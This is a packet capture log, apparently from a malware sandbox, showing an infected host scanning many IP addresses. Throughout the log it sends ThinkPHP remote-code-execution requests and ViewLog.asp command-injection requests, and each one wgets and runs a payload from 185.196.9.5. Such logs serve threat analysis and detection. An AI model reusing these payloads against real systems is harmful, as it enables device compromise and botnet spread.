Feb 25, 2024 19:02:27.402235985 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:02:23 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.15	50474	95.215.240.138	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:27.201205969 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:27.444403887 CET	420	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:29 GMT Server: Apache/2.2.15 (CentOS) Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.15	32800	85.24.247.248	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.315431118 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.15	52788	94.122.220.246	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.322738886 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.15	33868	95.86.91.99	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.332962036 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.15	52134	95.85.62.8	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.494760990 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:29.414755106 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.15	39544	62.103.27.217	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.539973021 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:29.734921932 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:29.958405018 CET	464	IN	HTTP/1.1 404 Not Found Date: Sun, 25 Feb 2024 20:02:28 GMT Server: Webs X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1;mode=block Cache-Control: no-store Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.15	51206	85.231.27.132	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.540040016 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:29.670767069 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:29.887969017 CET	561	IN	HTTP/1.1 404 Not Found Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type Content-Type: text/html Content-Length: 345 Date: Sun, 25 Feb 2024 18:02:29 GMT Server: WebServer Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.15	48870	94.121.146.120	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.542826891 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.15	43296	62.29.117.178	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.544718027 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.15	41874	112.171.60.150	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.721699953 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:29.029463053 CET	670	IN	Data Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.15	47156	112.31.250.19	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.813884974 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:29.183880091 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:02:47 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.15	37478	112.50.249.181	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.814261913 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:29.180003881 CET	312	IN	HTTP/1.1 400 Bad Request Server: Ysten-Cloud-Server Date: Sun, 25 Feb 2024 18:02:28 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.15	45318	112.13.96.73	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.839598894 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:29.230777979 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.15	55384	112.104.240.7	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.847543955 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.15	35932	85.30.213.157	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.982012987 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:29.201752901 CET	321	IN	HTTP/1.0 404 Not Found Date: Sun, 25 Feb 2024 21:02:26 GMT Server: Boa/0.94.13 Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.15	39470	31.200.95.246	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.985083103 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.15	53258	94.120.106.116	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.988614082 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.15	35110	62.29.112.14	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:28.990935087 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.15	48946	112.176.100.116	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:29.111083984 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
